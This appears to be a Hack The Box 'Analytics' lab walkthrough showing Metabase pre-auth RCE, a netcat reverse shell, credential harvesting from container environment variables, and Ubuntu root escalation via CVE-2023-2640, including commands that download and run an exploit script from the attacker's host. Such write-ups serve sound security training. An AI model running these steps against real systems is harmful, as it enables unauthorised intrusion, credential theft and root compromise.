Nmap Scan#

IP Address: 10.129.149.35
Hostname: analytical.htb
Open Ports: 22 (SSH), 80 (HTTP)

Reconnaissance#

Website Enumeration#

Following the Nmap scan, I navigated to the website hosted on port 80. I discovered a login page and subsequently updated the /etc/hosts file to include both analytical.htb and data.analytical.htb.

127.0.0.1       localhost
127.0.1.1       kali
10.129.149.35   analytical.htb data.analytical.htb

Point of Compromise (POC)#

Upon further inspection, I identified the login page as part of Metabase, a popular open-source data visualization platform.
I found a Pre-auth Remote Code Execution (RCE) exploit detailed here.

Metabase Exploit Source

Initial Access#

Exploit Setup#

After reviewing the exploit, I customized it by inserting a reverse shell payload.

Exploit Preparation

Obtaining the Setup Token#

I accessed /api/session/properties to retrieve the setup token needed to proceed with the exploit.

Setup Token Retrieval

Reverse Shell Generation#

Using revshells.com, I crafted a reverse shell payload.

Note: Ensure the encoded payload does not include = characters.

Shell Generation

Gaining Shell Access#

With BurpSuite, I captured a request, replaced it with the malicious payload, and forwarded it to obtain an initial shell.

BurpShell Launch Shell Received Shell Details

┌──(root㉿kali)-[~/Documents/Notes/hackthebox/Analytics]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.4] from (UNKNOWN) [10.129.149.35] 45844
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
28b3b7e265f7:/$

Lateral Movement#

Container Breakout#

The initial shell was inside a Docker container.
Navigating to /app, I found the run_metabase.sh script:

28b3b7e265f7:/$ cd /app
cd /app
28b3b7e265f7:/app$ ls
ls
certs
metabase.jar
run_metabase.sh
28b3b7e265f7:/app$ cat run_metabase.sh
cat run_metabase.sh
#!/bin/bash

...

# Here we define which env vars are the ones that will be supported with a "_FILE" ending. We started with the ones that would contain sensitive data
docker_setup_env() {
    file_env 'MB_DB_USER'
    file_env 'MB_DB_PASS'
    file_env 'MB_DB_CONNECTION_URI'
    file_env 'MB_EMAIL_SMTP_PASSWORD'
    file_env 'MB_EMAIL_SMTP_USERNAME'
    file_env 'MB_LDAP_PASSWORD'
    file_env 'MB_LDAP_BIND_DN'
}


...

28b3b7e265f7:/app$

Notably, the script referenced sensitive environment variables.

Dumping Environment Variables#

I enumerated the environment and discovered hardcoded credentials:

28b3b7e265f7:/app$ printenv
printenv
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=28b3b7e265f7
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/app
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=************
META_PASS=******************
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/bin/printenv
OLDPWD=/
28b3b7e265f7:/app$

SSH Access#

Using the leaked credentials, I gained SSH access to the main host:

┌──(root㉿kali)-[~/Documents/Notes/hackthebox/Analytics]
└─# ssh ********@analytical.htb
************@analytical.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Oct 10 07:54:23 PM UTC 2023

  System load:              0.025390625
  Usage of /:               95.9% of 7.78GB
  Memory usage:             29%
  Swap usage:               0%
  Processes:                158
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0:    10.129.149.35
  IPv6 address for eth0:    dead:beef::250:56ff:feb0:b4ed

  => / is using 95.9% of 7.78GB


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Oct 10 19:32:27 2023 from 10.10.16.4

Privilege Escalation#

After researching potential vulnerabilities, I discovered a local privilege escalation involving Ubuntu (CVE-2023-2640).

Reference: Reddit Post
Exploit Source: GitHub Repository

Exploit Download & Hosting#

git clone https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629.git
cd CVE-2023-2640-CVE-2023-32629
chmod +x exploit.sh
updog -p 80

(Hosting exploit locally via Updog.)

Execution on Target#

On the target system:

wget http://10.10.16.79/exploit.sh -O exploit.sh
chmod +x exploit.sh
./exploit.sh

Successful privilege escalation:

root@analytics:/tmp/u# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)

Conclusion#

This box highlights the importance of:

Properly securing applications like Metabase (e.g., authentication hardening).
Avoiding credential leakage via environment variables.
Keeping systems patched against known vulnerabilities.

Through a combination of web exploitation, container breakout, credential harvesting, and local privilege escalation, full system compromise was achieved.

Analytics Walkthrough